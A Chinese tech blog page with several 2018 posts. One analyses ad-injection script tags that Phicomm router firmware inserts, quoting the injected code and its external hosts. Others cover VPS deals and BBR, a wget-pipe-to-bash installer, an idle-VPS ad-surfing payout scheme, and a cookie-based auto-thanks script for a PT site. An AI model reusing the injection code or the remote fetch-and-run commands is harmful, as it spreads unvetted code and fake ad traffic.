关于近期斐讯固件强制推送广告的分析

关于近期斐讯固件强制推送广告的分析有44条评论

2018年8月13日 at 下午10:44分类:路由器 阅读: 3,547 次

【问题表现】
据不少人反馈,斐讯固件目前开始强制推送广告,表现为:
1、会自动弹出http://p.6d63d3.com网站的广告,如网络游戏

2、查看源码,会发现弹出广告的http网站源码中会多出如下注入代码:

<script src=http://172.81.246.180:11211/t.js?MAC=XXXXXXXXXXXX></script>

<script src=http://103.49.209.27:11211/t.js?MAC=XXXXXXXXXXXX></script>

【问题定位】
搜索注入代码的网址“103.49.209.27”,在K3中可以在up_script变量中发现:

搜索up_script变量,可以发现在官方如下文件中存在此变量:

在K3C中搜索“103.49.209.27”,可以在schemeupgrade配置文件中找到:

同时搜索schemeupgrade.config.script,发现在uhttpd这个web服务程序中也会操作此配置项

因此综合K3和K3C的分析,可以判断注入代码与两个模块密切相关,一个是官方的策略升级模块schemeupgrade、一个是官方的web服务程序(httpd或uhttpd)

【解决思路】
1、删除策略升级程序schemeupgrade
2、修改web服务程序,将写入的变量名改变

由于K3C官改在以前已经删除策略升级程序,因此极大可能是web服务程序导致的广告注入代码写入

目前针对此问题的修改固件正在QQ群内测,不久即将开放自动升级,官改版本可以在web页面的“自动升级”页面进行更新

【其他说明】
由于没有源代码,官改版本对官方的修改类似于黑盒方式,大多情况下并不知道可执行程序的内部流程,只能删除或修改配置,很难修改其可执行程序,同时由于反编译分析的难度较高,官改版本无法保证发现官方所有的漏洞和风险
升级后如再出现强制广告问题,可在本文后留言

 

另据反馈,并不是所有官改都会出现此问题,我自己也没有碰到,因此推测可能还有一定的触发条件,比如:

1、强制弹出广告的路由上是否开启了广告屏蔽

2、是否使用了官方APP远程管理或者手机web界面管理

virmach 特价促销,KVM VPS $5/年起

virmach 特价促销,KVM VPS $5/年起有7条评论

2018年8月11日 at 上午9:33分类:建站 阅读: 4,934 次

2018/08/11 virmach新推出每年5刀的128M KVM,需要的速抢

优惠码 LETAUGUST2018

折后KVM $5/年起

另还有512M、1G内存的KVM,折后价格为$10/年、$15/年,注意优惠码每个账号只能用一次

如果你还想搞个小网站、搭个frp玩玩,推荐购买$10/年的,128M内存有点小,512M够用

128M $5/年:
购买链接

512M $10/年:

购买链接

1G内存 $15/年:

购买链接

购买下单时记得输入优惠码:LETAUGUST2018
$5 VPS性能:

性能2:

油管(未加bbr)

差强人意

----------------------------------------------------------------------------------------------
开启bbr方法
1. 进入https://solusvm.virmach.com/login.php 点忘记密码,输入username(已发生到你邮箱)会发送密码复位邮件到你注册邮箱,照着做就能拿到面板密码

2. 登录Virmach管理面板,将系统选择重装成Debian9,然后SSH登录到VPS,不需要手动去更换内核,只需要三行命令就能启用:

echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf
sysctl -p

检测BBR是否开启:lsmod | grep bbr

开启BBR后网速会有很大提升,尤其是高峰时段

Debian9+BBR(2018/08/12 11:30)


----------------------------------------------------------------------------------------------

VPS速度监控页面
http://iytc.net/iot/web.html
一天中的速度表现不是太稳定

----------------------------------------------------------------------------------------------
下面评测的是$0.87/月 256M SSD KVM:

配置:
类型:kvm
内存:256M
硬盘:10G SSD
流量:500G/月
机房:洛杉矶CC机房
价格:$0.87/月或$9.37/年
购买链接
产品列表
注:$0.87/月只针对新用户,优惠码为zhujiceping,年付和老用户试试zhujiceping25
优惠码开启教程:
http://www.hostloc.com/thread-436711-1-1.html

【所有套餐】
优惠码:zhujiceping15,终身8.5折,无限制使用
优惠码:zhujiceping25,终身7.5折,每个用户只能使用一次
优惠码:zhujiceping, 终身7折, 仅限新用户。

全部KVM系列的VPS

1Gbps带宽,纯SSD,solusvm面板,默认自带1个IPv4,从1G内存开始支持Windows系统

内存 CPU SSD 流量 价格 购买
SSD256 256M 1核 10G 500G $1.25/月 链接
SSD512 512M 1核 15G 1T $2.5/月 链接
SSD1G 1G 1核 20G 1T $7/月 链接
SSD2G 2G 2核 35G 2T $12/月 链接
SSD4G 4G 3核 50G 3T $20/月 链接
SSD8G 8G 4核 100G 4T $40/月 链接
SSD16G 16G 6核 250G 5T $80/月 链接
SSD32G 32G 8核 500G 10T $160/月 链接

全部OpenVZ系列VPS

1Gbps带宽,纯SSD,solusvm面板,默认自带1个IPv4

内存 CPU SSD 流量 价格 购买
Micro+ 192M 1核 10G 250G $1/月 链接
Value+ 512M 2核 20G 500G $2.25/月 链接
Elite+ 1G 2核 30G 1T $4/月 链接
Pro+ 2G 3核 50G 2T $7/月 链接
Ent+ 8G 4核 100G 3T $12/月 链接

大硬盘VPS(不能用优惠码)

KVM虚拟,硬盘raid50,1Gbps带宽,纽约机房

内存 硬盘 CPU 流量 价格 购买
512M 500G 1核 5T $3.5/月 链接
1G 1T 1核 10T $7/月 链接
2G 2T 2核 20T $14/月 链接
4G 4T 2核 40T $28/月 链接

 

 

性能测试:

到国内速度10Mbps左右

在线测试报告:
https://zbench.kirito.moe/record-cn.php?IKEY=6657

油管刚开始速度较低,1分钟后稳定在5000左右(未开BBR,深圳电信100M,早上9:40):

CentOS 6 64位系统安装BBR:
wget -O- http://iytc.net/tools/install_bbr_centos.sh | bash

安装结束后重启,输入命令查看是否开启BBR:
# sysctl -a|grep tcp_congestion_control
net.ipv4.tcp_congestion_control = bbr

开油管,速度达到1万多:

全国ping:

去程路由:

回程路由:

此vps特点:硬盘为SSD,IO还可以,KVM稳定适合折腾,线路速度一般,需要低价KVM的建议入手

一天的ping及下载速度情况:

速度比较稳定,高峰期没有明显下降,全天速度基本在8Mbps以上

24小时ping和下载速度监测:
http://iytc.net/iot/web.html

补充:
又开了一个圣何塞的

硬盘IO变差,网速变低?

油管速度(未开bbr,深圳电信100M)

油管速度(开bbr,深圳电信100M)

同一时间(2018-05-01 18:30)洛杉矶速度:

差别不大

经过几天的监测,发现圣何塞机房要稍好于洛杉矶机房:
洛杉矶最近3小时速度监控:

圣何塞最近3小时速度监控:

维持在1MB/s以上
洛杉矶一天的速度监控:

圣何塞一天的速度监控:

跟踪路由,青岛阿里云的联通线路是在圣何塞登录:

实测:利用闲置VPS挂机浏览广告赚美元

实测:利用闲置VPS挂机浏览广告赚美元有3条评论

2018年8月8日 at 上午9:30分类:其他 阅读: 1,637 次

首先注册alexamaster

注册地址

注册不能用qq邮箱,注册后登陆账户,点击surfs

点击surf now,会有一个链接,这个就是你的赚钱链接:

你可以在windows上用chrome或firefox直接打开此链接,会自动浏览广告页面赚取点击数,浏览器需在设置中允许弹窗。

如果你是linux系统,建议安装ubuntu16.04 64位版本,然后运行如下脚本可以自动挖矿

wget xiaofd.github.io/vncam.sh
bash vncam.sh -p 'xiaofd.github.io/others/passwd-d10086' -u 'https://www.alexamaster.net/Master/102700'

https://www.alexamaster.net/Master/102700替换成你的链接

点击上一个图中的“MY SURFS”可以查看你的挖矿客户端是否运行

赚到1美元以上即可提取到Paypal

实测用5个vps运行6天后达到1美元提现门槛:

每个vps的内存在512M或以上,4个运行Ubuntu,1个运行windows,由于浏览器可能存在跑死现象,因此通过脚本对浏览器任务进行监控,并且每天定时重启vps

 


【windows监控脚本】

1、设置chrome浏览器的主页为你的浏览广告地址,比如https://www.alexamaster.net/Master/102700

2、编写批处理,保存为alex.bat

:start
taskkill /IM chrome.exe 
ping 127.0.0.1 -n 30 >nul
cd "C:\Program Files (x86)\Google\Chrome\Application\"
echo %date:~0,4%-%date:~5,2%-%date:~8,2%-%time:~0,2%:%time:~3,2%:%time:~6,2%
start chrome.exe
ping 127.0.0.1 -n 7200 >nul
goto start

运行alex.bat,会每两个小时重启chrome浏览器,防止卡死

【linux脚本】

1、建立监控脚本,比如/root/mon.sh

#!/bin/sh
echo `date`>>/tmp/mon.txt
icount=`ps aux |grep firefox|grep -v grep|wc -l`
if [ $icount -lt 1 ] ;then
/sbin/reboot
fi
icount=`netstat -nautp|grep firefox|grep -v grep|wc -l`
if [ $icount -lt 3 ] ;then
killall firefox
sleep 2
su root -c 'export DISPLAY=localhost:1;firefox --profile ~/.alexa/alexa --new-tab https://www.alexamaster.net/Master/102700 &'
fi

上述脚本对firefox浏览器进行监控,发现异常会自动重启

2、增加定时任务

crontab -e

输入:

0 4 * * * /sbin/reboot
*/20 * * * * /root/mon.sh

每天重启一次,每20分钟检查firefox进程


 

下面实测提现过程:

选make money,request:

可以看到,提现还要满足上述所有条件,Good votes要达到200,可以通过Earn Points做任务、加朋友或朋友聊天来提高votes

当Good votes达到200后,可以申请提现到paypal

一天内到达PP账户

提现金额与等待天数关系:

 

美元到手,想赚人民币的参考下文:

利用闲置VPS或计算机挖矿实测

 

windows下利用python脚本自动获取pt积分或签到

windows下利用python脚本自动获取pt积分或签到无评论

2018年8月3日 at 下午4:25分类:其他 阅读: 568 次

1、windows下安装python https://www.python.org/downloads/release/python-2715/ 2、安装requests包 下载zip包 https://github.com/requests/requests 解压到windows目录 安装,进入解压目录,运行

c:\python27\python setup.py install

3、寻找获取PT积分或签到积分的链接,比如此例子中使用“感谢”功能获得魔力值:

4、获取cookie。打开浏览器调试功能,点击上面的按钮,你可以获得cookie信息:

5、写脚本,定时对不同id文章进行感谢,获取魔力值

import requests,time,random
 
h={
        'Host':'pt.btschool.net',
        'User-Agent':'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/5.0 Chrome/61.0.3163.79 Safari/537.36',
        'Accept-Language': 'zh-CN',
        'Referer':'https://pt.btschool.net/details.php?id=3100&hit=1',
} #header
 
c={
        'c_secure_login':'bmfdZQ==',
        'c_secure_pass':'3bfdac1122339155ea8f860c11418c109',
        'c_secure_ssl':'eawdhaA==',
        'c_secure_tracker_ssl':'bm9wZQ==',
        'c_secure_uid':'Mdsa3NTU='
} #cookie 
 
url="https://pt.btschool.net/thanks.php" #url
 
s=requests.Session()
 
s.headers.update(h)
s.cookies.update(c)
 
for d in range(1, 5000) :
        md=random.randint(1,5000)
        req=s.post(url,data={'id':md})
        print('no:',d,'md:',md,'status:',req.status_code)
        time.sleep(10) #delay

其中的cookie改成你获取的即可

把脚本保存为bt.py,然后windows命令行运行

python bt.py

linux centos下下载百度云

linux centos下下载百度云无评论

2018年8月3日 at 下午12:15分类:其他 阅读: 556 次

1、下载BaiduPCS-Go
https://github.com/iikira/BaiduPCS-Go/releases

2、将执行文件上传到centos服务器,比如/home/baidu目录,更改权限为可执行

3、登录账户

cd /home/baidu
./BaiduPCS-Go login

输入百度云账户登录

4、设置服务器下载目录
./BaiduPCS-Go config set -savedir /home/baidu

5、下载百度云目录
./BaiduPCS-Go cd /
./BaiduPCS-Go d AC9 &
下载百度云的/AC9目录

下载的目录在/home/baidu下

下载速度还不错:

帮助文档:
https://github.com/iikira/BaiduPCS-Go